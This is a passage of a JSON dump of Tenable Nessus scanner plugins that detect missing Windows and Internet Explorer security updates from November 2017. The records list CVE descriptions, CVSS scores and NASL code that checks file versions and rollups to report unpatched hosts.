An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)\");\n # https://support.microsoft.com/en-us/help/4048957/windows-7-update-kb4048957\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0ad6eb38\");\n # https://support.microsoft.com/en-us/help/4048959/windows-server-2012-update-kb4048959\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c6afa4db\");\n # https://support.microsoft.com/en-us/help/4048958/windows-81-update-kb4048958\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6b7fa1d0\");\n # https://support.microsoft.com/en-us/help/4047206/cumulative-security-update-for-internet-explorer\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?da0fd90f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released security updates for the affected versions of Internet Explorer.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11827\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/23\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-11';\nkbs = make_list(\n '4048957',\n '4048959',\n '4048958',\n '4047206'\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nos = get_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n # Internet Explorer 11\n 
hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.18838\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4047206\") ||\n\n # Windows Server 2012\n # Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"mshtml.dll\", version:\"10.0.9200.22297\", min_version:\"10.0.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4047206\") ||\n\n # Windows 7 / Server 2008 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mshtml.dll\", version:\"11.0.9600.18838\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4047206\") ||\n\n # Windows Server 2008\n # Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.21073\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4047206\")\n)\n{\n report = '\\nNote: The fix for this issue is available in either of the following updates:\\n';\n report += ' - KB4047206 : Cumulative Security Update for Internet Explorer\\n';\n if(os == \"6.3\")\n {\n report += ' - KB4048958 : Windows 8.1 / Server 2012 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS17-11', kb:'4048958', report);\n }\n else if(os == \"6.2\")\n {\n report += ' - KB4048959 : Windows Server 2012 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS17-11', kb:'4048959', report);\n }\n else if(os == \"6.1\")\n {\n report += ' - KB4048957 : Windows 7 / Server 2008 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS17-11', kb:'4048957', report);\n }\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T06:19:37", "description": "The remote Windows host is missing security update 4048962\nor cumulative update 4048959. 
It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n way that the Microsoft Windows Embedded OpenType (EOT)\n font engine parses specially crafted embedded fonts. An\n attacker who successfully exploited this vulnerability\n could potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2017-11832)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11827,\n CVE-2017-11858)\n\n - An information vulnerability exists when Windows Media\n Player improperly discloses file information. Successful\n exploitation of the vulnerability could allow the\n attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11880)\n\n - A Win32k information disclosure vulnerability exists\n when the Windows GDI component improperly discloses\n kernel memory addresses. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. 
(CVE-2017-11851)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11855,\n CVE-2017-11869)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2017-11847)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-11831,\n CVE-2017-11842, CVE-2017-11849, CVE-2017-11853)\n\n - A denial of service vulnerability exists when Windows\n Search improperly handles objects in memory. 
An attacker\n who successfully exploited the vulnerability could cause\n a remote denial of service against a system.\n (CVE-2017-11788)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11850)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11843, CVE-2017-11846)", "edition": 38, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-11-14T00:00:00", "title": "Windows Server 2012 November 2017 Security Updates", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11880", "CVE-2017-11851", "CVE-2017-11834", "CVE-2017-11848", "CVE-2017-11842", "CVE-2017-11831", "CVE-2017-11791", "CVE-2017-11788", "CVE-2017-11827", "CVE-2017-11869", "CVE-2017-11832", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11849", "CVE-2017-11843", "CVE-2017-11847", "CVE-2017-11853", "CVE-2017-11846", "CVE-2017-11850", "CVE-2017-11768"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_NOV_4048959.NASL", "href": "https://www.tenable.com/plugins/nessus/104555", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104555);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-11768\",\n \"CVE-2017-11788\",\n \"CVE-2017-11791\",\n \"CVE-2017-11827\",\n \"CVE-2017-11831\",\n \"CVE-2017-11832\",\n \"CVE-2017-11834\",\n \"CVE-2017-11842\",\n \"CVE-2017-11843\",\n \"CVE-2017-11846\",\n \"CVE-2017-11847\",\n \"CVE-2017-11848\",\n \"CVE-2017-11849\",\n \"CVE-2017-11850\",\n \"CVE-2017-11851\",\n \"CVE-2017-11853\",\n \"CVE-2017-11855\",\n \"CVE-2017-11858\",\n \"CVE-2017-11869\",\n \"CVE-2017-11880\"\n );\n script_bugtraq_id(\n 101703,\n 101705,\n 101709,\n 101711,\n 101715,\n 101716,\n 101719,\n 101721,\n 101725,\n 101726,\n 101729,\n 101738,\n 101740,\n 101741,\n 101742,\n 101751,\n 101755,\n 101762,\n 101763,\n 101764\n );\n script_xref(name:\"MSKB\", value:\"4048962\");\n script_xref(name:\"MSKB\", value:\"4048959\");\n script_xref(name:\"MSFT\", value:\"MS17-4048959\");\n script_xref(name:\"MSFT\", value:\"MS17-4048962\");\n\n script_name(english:\"Windows Server 2012 November 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4048962\nor cumulative update 4048959. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n way that the Microsoft Windows Embedded OpenType (EOT)\n font engine parses specially crafted embedded fonts. An\n attacker who successfully exploited this vulnerability\n could potentially read data that was not intended to be\n disclosed. 
Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2017-11832)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11827,\n CVE-2017-11858)\n\n - An information vulnerability exists when Windows Media\n Player improperly discloses file information. Successful\n exploitation of the vulnerability could allow the\n attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11880)\n\n - A Win32k information disclosure vulnerability exists\n when the Windows GDI component improperly discloses\n kernel memory addresses. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11851)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. 
(CVE-2017-11855,\n CVE-2017-11869)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2017-11847)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-11831,\n CVE-2017-11842, CVE-2017-11849, CVE-2017-11853)\n\n - A denial of service vulnerability exists when Windows\n Search improperly handles objects in memory. An attacker\n who successfully exploited the vulnerability could cause\n a remote denial of service against a system.\n (CVE-2017-11788)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11850)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. 
The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11843, CVE-2017-11846)\");\n # https://support.microsoft.com/en-us/help/4048962/windows-server-2012-update-kb4048962\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8767d873\");\n # https://support.microsoft.com/en-us/help/4048959/windows-server-2012-update-kb4048959\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c6afa4db\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4048962 or Cumulative update KB4048959.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11847\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned 
by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-11\";\nkbs = make_list('4048962', '4048959');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"11_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4048962, 4048959])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T06:19:35", "description": "The remote Windows host is missing security update 4048960\nor cumulative update 4048957. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. 
The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11827,\n CVE-2017-11858)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11837, CVE-2017-11838, CVE-2017-11843,\n CVE-2017-11846)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11855,\n CVE-2017-11856, CVE-2017-11869)\n\n - An information vulnerability exists when Windows Media\n Player improperly discloses file information. Successful\n exploitation of the vulnerability could allow the\n attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. 
An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11880)\n\n - An information disclosure vulnerability exists in the\n way that the Microsoft Windows Embedded OpenType (EOT)\n font engine parses specially crafted embedded fonts. An\n attacker who successfully exploited this vulnerability\n could potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2017-11832,\n CVE-2017-11835)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2017-11847)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. 
(CVE-2017-11831,\n CVE-2017-11849, CVE-2017-11853)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)\n\n - A denial of service vulnerability exists when Windows\n Search improperly handles objects in memory. An attacker\n who successfully exploited the vulnerability could cause\n a remote denial of service against a system.\n (CVE-2017-11788)\n\n - A Win32k information disclosure vulnerability exists\n when the Windows GDI component improperly discloses\n kernel memory addresses. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11851,\n CVE-2017-11852)", "edition": 38, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-11-14T00:00:00", "title": "Windows 7 and Windows Server 2008 R2 November 2017 Security Updates", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11835", "CVE-2017-11880", "CVE-2017-11851", "CVE-2017-11856", "CVE-2017-11834", "CVE-2017-11852", "CVE-2017-11848", "CVE-2017-11831", "CVE-2017-11791", "CVE-2017-11788", "CVE-2017-11837", "CVE-2017-11838", "CVE-2017-11827", "CVE-2017-11869", "CVE-2017-11832", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11849", "CVE-2017-11843", "CVE-2017-11847", "CVE-2017-11853", "CVE-2017-11846", "CVE-2017-11768"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_NOV_4048957.NASL", "href": "https://www.tenable.com/plugins/nessus/104553", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104553);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-11768\",\n \"CVE-2017-11788\",\n \"CVE-2017-11791\",\n \"CVE-2017-11827\",\n \"CVE-2017-11831\",\n \"CVE-2017-11832\",\n \"CVE-2017-11834\",\n \"CVE-2017-11835\",\n \"CVE-2017-11837\",\n \"CVE-2017-11838\",\n \"CVE-2017-11843\",\n \"CVE-2017-11846\",\n \"CVE-2017-11847\",\n \"CVE-2017-11848\",\n \"CVE-2017-11849\",\n \"CVE-2017-11851\",\n \"CVE-2017-11852\",\n \"CVE-2017-11853\",\n \"CVE-2017-11855\",\n \"CVE-2017-11856\",\n \"CVE-2017-11858\",\n \"CVE-2017-11869\",\n \"CVE-2017-11880\"\n );\n script_bugtraq_id(\n 101703,\n 101705,\n 101709,\n 101711,\n 101715,\n 101716,\n 101721,\n 101722,\n 101725,\n 101726,\n 101729,\n 101736,\n 101737,\n 101739,\n 101740,\n 101741,\n 101742,\n 101751,\n 101753,\n 101755,\n 101762,\n 101763,\n 101764\n );\n script_xref(name:\"MSKB\", value:\"4048960\");\n script_xref(name:\"MSKB\", value:\"4048957\");\n script_xref(name:\"MSFT\", value:\"MS17-4048957\");\n script_xref(name:\"MSFT\", value:\"MS17-4048960\");\n\n script_name(english:\"Windows 7 and Windows Server 2008 R2 November 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4048960\nor cumulative update 4048957. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11827,\n CVE-2017-11858)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11837, CVE-2017-11838, CVE-2017-11843,\n CVE-2017-11846)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11855,\n CVE-2017-11856, CVE-2017-11869)\n\n - An information vulnerability exists when Windows Media\n Player improperly discloses file information. Successful\n exploitation of the vulnerability could allow the\n attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11880)\n\n - An information disclosure vulnerability exists in the\n way that the Microsoft Windows Embedded OpenType (EOT)\n font engine parses specially crafted embedded fonts. 
An\n attacker who successfully exploited this vulnerability\n could potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2017-11832,\n CVE-2017-11835)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2017-11847)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-11831,\n CVE-2017-11849, CVE-2017-11853)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)\n\n - A denial of service vulnerability exists when Windows\n Search improperly handles objects in memory. An attacker\n who successfully exploited the vulnerability could cause\n a remote denial of service against a system.\n (CVE-2017-11788)\n\n - A Win32k information disclosure vulnerability exists\n when the Windows GDI component improperly discloses\n kernel memory addresses. 
An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11851,\n CVE-2017-11852)\");\n # https://support.microsoft.com/en-us/help/4048960/windows-7-update-kb4048960\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?46648b9c\");\n # https://support.microsoft.com/en-us/help/4048957/windows-7-update-kb4048957\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0ad6eb38\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4048960 or Cumulative update KB4048957.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11847\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
